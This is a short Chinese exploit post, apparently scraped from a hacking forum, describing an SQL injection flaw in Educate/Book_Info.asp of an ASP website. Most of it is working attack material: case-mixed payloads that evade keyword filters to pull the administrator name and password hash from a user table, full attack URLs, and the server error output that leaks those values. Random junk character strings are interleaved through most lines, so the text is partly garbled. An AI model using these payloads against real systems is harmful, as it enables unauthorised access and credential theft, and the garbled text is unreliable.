漏洞出现在Educate/Book_Info.asp
: P9 @# `- f1 }. Z$ `* E此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
& y$ T% Y4 ?! ^: b( |$ A0 r Yexp:如下3 ~2 M" s3 B/ S# Q& Z2 _ N
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
% w# C! ^9 j2 } Q查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)& \& u" X% T9 U6 B
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)# z! S7 w! G( I+ P. Q c' v
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'% ^: ?, g6 V) x) k* ~' W. N
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
; b; @9 f; @5 f) f0 e/Educate/Book_Info.asp,行 80 B3 @: t1 H ]+ u- D
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
/ Z: `) _: N1 U6 n1 |+ sMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'6 Q- H) i1 `5 M% P
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。9 h4 a! w( K1 O6 @% U. c" ]) b
/Educate/Book_Info.asp,行 8 |